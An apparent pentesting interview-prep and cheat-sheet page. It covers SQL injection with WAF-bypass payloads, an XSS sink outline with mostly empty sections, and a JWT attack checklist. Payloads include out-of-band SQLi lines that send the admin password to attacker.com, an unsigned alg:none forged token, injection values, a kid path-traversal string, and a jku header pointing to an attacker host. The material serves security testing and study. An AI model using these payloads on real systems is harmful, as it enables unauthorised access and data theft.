Interview

1. What is XSS?

2. What is CSP?

3. How do nmap uses sT flag and discovers that the port is open?

4. CSP is implemented but still there is XSS — how?

5. How to bypass file upload restrictions?

6. What is double extension upload? How can it lead to RCE?

7. What are the types of Windows privilege escalation or attacks?

8. How to generate a CVSS score for a live vulnerability?

9. What is SOP (Same-Origin Policy)?

10. What is CORS and how can it be misconfigured?

11. What are JWT-based attacks? How to exploit them?

12. What is NoSQLi (NoSQL Injection)?

13. What is LDAP Injection and how is it performed?

14. If HTTPS is enabled, how does Burp Suite intercept requests?

15. What is SSRF (Server-Side Request Forgery)?

16. What is SSTI (Server-Side Template Injection)?

17. JWT should be stored where — localStorage or sessionStorage?

18. How to exploit SSRF if localhost/127.0.0.1 is blocked?

19. What is the methodology for API pentesting?

20. Will you be able to perform a 10,000-endpoint API pentest?

1. What is sql injection ?

• In band sqli : error based sqli , Union-Based SQLi

• Blind SQLi : Boolean based sqli, Time based sqli

• Out band sqli: He we get the out put from different sources like dns and http

For mssql we can use

'; EXEC master..xp_dirtree '\\attacker.com\share' --

For mysql we can use

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users WHERE username='admin'),'.attacker.com\\abc'));

🧠 Bypasses for Filters & WAFs

SQLi filters often block common patterns (', --, UNION, OR, =, etc.). Here are bypass tricks:
1. Case Variation:

UnIoN SeLeCt ...

2. Inline Comments:

UN/**/ION/**/SELECT
SELE/*comment*/CT

3. URL Encoding:

%27 OR %271%27=%271 --  (for ')

4. Hex Encoding:

SELECT 0x61646d696e  -- returns 'admin'

5. Double Encoding:

%2527 instead of %27

6. Whitespace Bypass:

UNION%0ASELECT
UNION/**/SELECT

7. Tab Bypass:

UNION%09SELECT

8. Logical Operators:

' OR TRUE--
' OR 1=1--

9. Using LIKE, REGEXP, etc.

' OR username LIKE 'a%'

🛡️ Ultimate XSS Sink Reference (JavaScript Functions Leading to XSS)

This document contains an exhaustive list of JavaScript functions, DOM APIs, and browser behaviors that can lead to Cross-Site Scripting (XSS) when used improperly with user-controllable input.

💥 What is XSS?

Cross-Site Scripting (XSS) is a web vulnerability where an attacker injects malicious scripts into websites, affecting users who interact with that site.

🔥 1. JavaScript Code Execution Functions

These execute any string as JavaScript. Extremely dangerous if fed with untrusted input.

🔨 2. HTML Injection into the DOM

These directly place HTML/JS into the page. Must be avoided or strictly sanitized.

🔐 3. Dangerous Attribute Injections

Injecting into HTML attributes (e.g., src, href, onerror) can lead to XSS.

🌐 4. Location & URL-Based Sinks

These reflect the URL and are often used in unsafe rendering or DOM reads.

⚙️ 5. Browser APIs That Render HTML/Execute JS

🧰 6. Template Engine Risks

🧨 7. HTML5 / Special Feature Triggers

✅ Safer Alternatives

🔚 Conclusion

Never trust user input when using dynamic HTML, JS, or templates. Always sanitize, escape properly, and avoid dangerous JS functions when unnecessary.

To test, use tools like:

• Burp Suite (Pro or Community)

• XSStrike

• DOM Invader (PortSwigger)

• CSP Evaluator + Report URI

Stay sharp, code safe 💻⚔️

🛠️ 🔐 JWT Penetration Testing Checklist (Fully Detailed)

📘 1. 🔎 Basic Enumeration

✅ Test:

• Token Structure: Is it a JWT?

  • Format: header.payload.signature

• Decode JWT (Base64):

  • Header: algorithm used?

  • Payload: roles, expiry, userID, admin flag?

📌 Tools:

# Decode manually
echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9' | base64 -d

Or use:

• https://jwt.io

• Burp Suite extension: JWT Editor, Hackvertor

⚠️ 2. 🔥 Algorithm-Based Attacks

🧨 a. alg: none attack

🚩 When vulnerable:

• JWT header: "alg": "none"

• Server doesn't verify signature

🧪 Test:

1. Change header to:

   Copy

• Copy

  { "alg": "none", "typ": "JWT" }

• Remove the signature (or leave it empty).

• Modify payload (e.g., "admin": true)

• Base64 encode and send token:

  Copy

1. Copy

   eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJhZG1pbiI6dHJ1ZX0.

✅ If accepted: Critical vulnerability.

🧨 b. Algorithm Confusion (RS256 → HS256)

🚩 When vulnerable:

• Server expects asymmetric RS256 (public/private key), but allows symmetric HS256 (HMAC).

🧪 Test:

1. Change alg to HS256

2. Use server's public key as the secret key to sign

3. Resign the token with HMAC using public key

✅ If accepted: Server confused symmetric vs. asymmetric algorithms.

📦 Tools:

• jwt_tool.py → --exploit alg_none, --exploit alg_hs256

📆 3. 🔒 Signature Key Bruteforce

🧨 a. Weak secret / brute force

🚩 When vulnerable:

• HS256, HS384, HS512 used with a guessable shared secret.

🧪 Test:

python3 jwt_tool.py <token> -d -S wordlist.txt

Or use:

• jwtcrack.py

• Burp Suite Intruder + SecLists weak passwords list

✅ If cracked, attacker can forge arbitrary tokens.

⏳ 4. 🧪 Expiry / Time-Based Attacks

⚙️ a. Modify exp, nbf, iat fields

• Try to bypass expiry:

{ "exp": 9999999999 }

• Try pre-validating tokens:

{ "nbf": 0, "iat": 0 }

✅ If server does not verify these fields → logic flaw.

🧍 5. 👑 Privilege Escalation

🎯 Target fields like:

• isAdmin

• role

• userid

• permissions

• access_level

🧪 Test:

1. Change payload:

   Copy

1. Copy

   { "role": "admin", "userid": 1 }

2. Resign (if possible) or use none/bruteforced key

✅ If access granted → vertical privilege escalation.

🔗 6. 🔄 Replay Attack

🧪 Test:

• Use captured JWT on another account/session

• See if same token grants access → token not scoped to user

✅ If works → JWT not bound to session/IP/device

🎣 7. 🪝 Injection in Payload

🧨 a. SQL Injection / NoSQL Injection

• JWT is used in database queries?

Payload:

{ "username": {"$ne": null} }

or

{ "userid": "1' OR '1'='1" }

✅ If DB logic accepts it → critical injection risk.

🪤 8. 🧪 IDOR + JWT

🎯 Use JWT to access other user’s data:

{ "userid": 1234 }
→ Try other user IDs

✅ If no access control enforced → Insecure Direct Object Reference.

🧩 9. 📦 JWT in Cookies / Storage

🧪 Test:

• Can you overwrite the cookie?

• Is the JWT in localStorage or sessionStorage?

  • Vulnerable to XSS?

• Can you refresh expired tokens? (Look for refresh tokens)

✅ If client has full control → combine with XSS

🔁 10. Refresh Token Exploits

🧪 Test:

• Capture refresh token

• Try replaying

• Try CSRF on refresh endpoint

• Does it return new access token?

✅ If refresh token never expires / is not bound → long-term hijack possible.

💥 11. Advanced & Real-World Exploits

🚩 a. Key Disclosure via LFI

• If the private key is accessible via LFI → attacker can sign own tokens.

🚩 b. Kid Header Injection

{ "kid": "../../../../../../etc/passwd" }

✅ If used to load keys from disk, this can lead to path traversal + key loading.

🚩 c. JWT in Authorization header (CSRFable)

Authorization: Bearer <token>

✅ If the token is used in a header without SameSite protection, you may be able to CSRF it from another origin.

🚩 d. JWK Injection

If app supports jku or x5u in JWT header:

{
  "jku": "https://attacker.com/mykey.json"
}

✅ If accepted → attacker can inject their key + sign arbitrary tokens.

🧰 Tools & Wordlists

• 🔧 jwt_tool

• 🔧 jwt-cracker

• 🔧 JOSEPH

• 📂 Wordlists: SecLists (Passwords, JWT Secrets, etc.)

🧱 Mitigation Cheatsheet (for defenders)